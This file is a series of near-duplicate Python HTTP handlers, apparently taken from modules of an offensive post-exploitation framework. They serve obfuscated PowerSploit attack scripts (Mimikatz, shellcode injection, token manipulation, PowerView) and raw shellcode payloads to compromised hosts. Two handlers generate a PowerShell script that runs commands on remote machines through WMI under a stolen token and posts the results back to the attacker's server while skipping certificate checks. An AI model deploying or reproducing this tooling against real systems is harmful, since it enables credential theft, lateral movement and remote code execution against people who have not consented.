    def on_request(self, context, request) -> None:
        """Serve the staged script or the configured shellcode file by request path.

        Dispatch is an exact string match on ``request.path`` with its leading
        ``/`` stripped; every other path gets a bare 404, so only the two names
        handled below are ever served.

        Args:
            context: module context; not used by this handler.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response``, ``end_headers`` and ``stop_tracking_host``.
        """
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Script is located relative to base_dir, read as text, passed
            # through obfs_ps_script with the configured obfs_name, and the
            # result becomes the response body. Rebinding the with-target is
            # harmless: the file object is still closed on exit.
            with open(
                    os.path.join(
                        base_dir,
                        'data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.shellcode_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # The configured file is sent byte-for-byte, with no transformation.
            with open(self.shellcode_path, 'rb') as shellcode:
                request.wfile.write(shellcode.read())

            # Target has the shellcode: stop tracking the host. Done after the
            # write, so an exception while writing leaves the host tracked.
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the token-manipulation script or a generated launcher script.

        Dispatch is an exact match on ``request.path`` without its leading
        ``/``; any other path gets a bare 404.

        Args:
            context: provides ``server``, ``localip`` and ``server_port``,
                which are interpolated into the generated script.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path: resolves against the process working directory,
            # unlike the base_dir-joined form used by sibling handlers.
            with open(
                    'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1',
                    'r') as ps_script:
                # Script text is passed through obfs_ps_script with the
                # configured obfs_name before being written. Rebinding the
                # with-target is harmless; the file is still closed on exit.
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Command to execute on the target system(s). self.command is
            # spliced unescaped into a double-quoted PowerShell string below
            # ("{command}"), so a value containing a double quote or backtick
            # breaks the generated script.
            command_to_execute = 'cmd.exe /c {}'.format(self.command)
            #context.log.debug(command_to_execute)

            # Template for the script returned to the client. It runs in the
            # process created with the impersonated token, invokes the command
            # on each entry of {targets}, and POSTs the collected output to
            # {server}://{addr}:{port}/. NOTE(review): the first statement sets
            # ServerCertificateValidationCallback to $true, so that POST
            # accepts any certificate -- nothing authenticates the receiving
            # endpoint. {targets} is inserted verbatim inside @(...), so
            # self.target_computers is presumably already a PowerShell list
            # literal (quoted, comma-separated) -- verify against the module's
            # option parsing.
            elevated_ps_command = '''
            [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
            function Send-POSTRequest {{
                [CmdletBinding()]
                Param (
                    [string] $data
                )
                $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
                $request.Method = 'POST';
                $request.ContentType = 'application/x-www-form-urlencoded';
                $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
                $request.ContentLength = $bytes.Length;
                $requestStream = $request.GetRequestStream();
                $requestStream.Write( $bytes, 0, $bytes.Length );
                $requestStream.Close();
                $request.GetResponse();
            }}

            $post_output = "";
            $targets = @({targets});
            foreach ($target in $targets){{
                try{{
                    Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
                    $post_output = $post_output + "Executed command on $target! `n";
                }} catch {{
                    $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
                }}
            }}
            Send-POSTRequest $post_output'''.format(
                server=context.server,
                addr=context.localip,
                port=context.server_port,
                targets=self.target_computers,
                command=command_to_execute)

            # Written as str: assumes wfile accepts text (Python 2 style
            # handler); a Python 3 handler would need bytes -- verify.
            request.wfile.write(elevated_ps_command)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the reflective-injection script or the configured payload file.

        Dispatch is an exact match on ``request.path`` with its leading ``/``
        removed; every other path gets a bare 404.

        Args:
            context: module context; not used by this handler.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response``, ``end_headers`` and ``stop_tracking_host``.
        """
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Script located under base_dir, read as text, transformed by
            # obfs_ps_script with the configured obfs_name, then written.
            # Rebinding the with-target is harmless; the file is still
            # closed on exit.
            with open(
                    os.path.join(
                        base_dir,
                        'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1'
                    ), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Host is untracked before the payload bytes are written, so a
            # failure in the write below still leaves it untracked (the
            # shellcode-serving sibling handlers do this after the write).
            request.stop_tracking_host()

            # Configured file is sent byte-for-byte.
            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the token-manipulation script or a generated launcher script.

        Only two exact path names (leading ``/`` stripped) are recognised;
        anything else is answered with a bare 404.

        Args:
            context: supplies ``server``, ``localip`` and ``server_port`` for
                the callback URL in the generated script.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Script under base_dir, read as text, transformed by obfs_ps_script
            # with the configured obfs_name, then written as the body.
            # Rebinding the with-target does not prevent the file being closed.
            with open(os.path.join(base_dir,'data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Command to execute on the target system(s). It is interpolated
            # unescaped into the double-quoted "{command}" argument of the
            # template below, so a double quote or backtick in self.command
            # produces a broken script.
            command_to_execute  = 'cmd.exe /c {}'.format(self.command)
            #context.log.debug(command_to_execute)

            # Script returned to the client: runs in the process created with
            # the impersonated token, invokes the command against each entry
            # of {targets}, and POSTs the accumulated output to
            # {server}://{addr}:{port}/. NOTE(review): the first statement sets
            # ServerCertificateValidationCallback to $true, so the POST accepts
            # any certificate and the receiving endpoint is not authenticated.
            # {targets} lands verbatim inside @(...), so self.target_computers
            # is presumably a ready-made PowerShell list literal -- verify.
            elevated_ps_command = '''
            [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
            function Send-POSTRequest {{
                [CmdletBinding()]
                Param (
                    [string] $data
                )
                $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
                $request.Method = 'POST';
                $request.ContentType = 'application/x-www-form-urlencoded';
                $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
                $request.ContentLength = $bytes.Length;
                $requestStream = $request.GetRequestStream();
                $requestStream.Write( $bytes, 0, $bytes.Length );
                $requestStream.Close();
                $request.GetResponse();
            }}

            $post_output = "";
            $targets = @({targets});
            foreach ($target in $targets){{
                try{{
                    Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
                    $post_output = $post_output + "Executed command on $target! `n";
                }} catch {{
                    $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
                }}
            }}
            Send-POSTRequest $post_output'''.format(server=context.server, 
                                                    addr=context.localip, 
                                                    port=context.server_port,
                                                    targets=self.target_computers,
                                                    command=command_to_execute)

            # Written as str; assumes a text-accepting wfile (Python 2 style).
            # A Python 3 handler would require bytes -- verify.
            request.wfile.write(elevated_ps_command)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the token-manipulation script; answer every other path with 404.

        Args:
            context: module context; unused here.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path: depends on the process working directory, unlike
            # sibling handlers that join against base_dir. The script text is
            # transformed by obfs_ps_script with the configured obfs_name before
            # being written; rebinding the with-target still closes the file.
            with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve PowerView.ps1 on an exact path match; 404 for anything else.

        Args:
            context: module context; unused here.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'PowerView.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path: resolves against the process working directory,
            # unlike the base_dir-joined form used by sibling handlers.
            with open('data/PowerSploit/Recon/PowerView.ps1', 'r') as ps_script:
                # NOTE(review): obfs_ps_script is called without an obfs_name
                # here, unlike every sibling handler -- presumably it has a
                # default; verify the helper's signature.
                ps_script = obfs_ps_script(ps_script.read())
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the token-manipulation script on an exact path match, else 404.

        Args:
            context: module context; not referenced by this handler.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path (CWD-dependent) rather than base_dir-joined. The
            # text is passed through obfs_ps_script with the configured
            # obfs_name and the result is written as the response body; the
            # file is still closed on exit despite the name being rebound.
            with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve Invoke-Mimikatz.ps1 on an exact path match; 404 otherwise.

        Args:
            context: module context; unused here.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Script located under base_dir, read as text, transformed by
            # obfs_ps_script with the configured obfs_name, then written.
            # Rebinding the with-target does not prevent the file being closed.
            with open(os.path.join(base_dir,'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve Invoke-Mimikatz.ps1 on an exact path match; 404 otherwise.

        Args:
            context: module context; not referenced by this handler.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if "Invoke-Mimikatz.ps1" == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path: resolves against the process working directory,
            # unlike the base_dir-joined form used by sibling handlers. The
            # text is transformed by obfs_ps_script with the configured
            # obfs_name before being written; the file is still closed on exit.
            with open("data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1", "r") as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve Invoke-Shellcode.ps1 once, then stop tracking the host.

        Exact path match with the leading ``/`` stripped; every other path
        gets a bare 404. This variant has no second stage: the only thing
        served is the script itself.

        Args:
            context: module context; unused here.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response``, ``end_headers`` and ``stop_tracking_host``.
        """
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path (CWD-dependent) rather than base_dir-joined. The
            # text is transformed by obfs_ps_script with the configured
            # obfs_name and written as the body; the file is still closed on
            # exit despite the name being rebound.
            with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

            # Host is untracked as soon as the script has been written.
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve Invoke-Mimikatz.ps1 on an exact path match; 404 otherwise.

        Args:
            context: module context; unused here.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response`` and ``end_headers``.
        """
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Script located under base_dir, read as text, transformed by
            # obfs_ps_script with the configured obfs_name, then written.
            # Rebinding the with-target is harmless; the file is still closed.
            with open(
                    os.path.join(
                        base_dir,
                        'data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the reflective-injection script or the configured payload file.

        Exact path match with the leading ``/`` stripped; all other paths get
        a bare 404.

        Args:
            context: module context; not referenced by this handler.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response``, ``end_headers`` and ``stop_tracking_host``.
        """
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path: resolves against the process working directory,
            # unlike the base_dir-joined form used by sibling handlers. Text
            # is transformed by obfs_ps_script with the configured obfs_name
            # before being written; the file is still closed on exit.
            with open('data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1', 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Untracked before the payload bytes are written: a failure in the
            # write below leaves the host untracked anyway (the shellcode
            # handlers in this family untrack only after a completed write).
            request.stop_tracking_host()

            # Configured file is sent byte-for-byte.
            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request) -> None:
        """Serve the staged script or the configured shellcode file by request path.

        Exact path match with the leading ``/`` stripped; every other path
        gets a bare 404, so only the two names below are ever served.

        Args:
            context: module context; unused here.
            request: HTTP request object exposing ``path``, ``wfile``,
                ``send_response``, ``end_headers`` and ``stop_tracking_host``.
        """
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Relative path (CWD-dependent) rather than base_dir-joined. The
            # text is transformed by obfs_ps_script with the configured
            # obfs_name and written as the body; the file is still closed on
            # exit despite the name being rebound.
            with open('data/PowerSploit/CodeExecution/Invoke-Shellcode.ps1' ,'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.shellcode_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Configured file is sent byte-for-byte, with no transformation.
            with open(self.shellcode_path, 'rb') as shellcode:
                request.wfile.write(shellcode.read())

            # Target has the shellcode: stop tracking the host. Done after the
            # write, so an exception while writing leaves the host tracked.
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()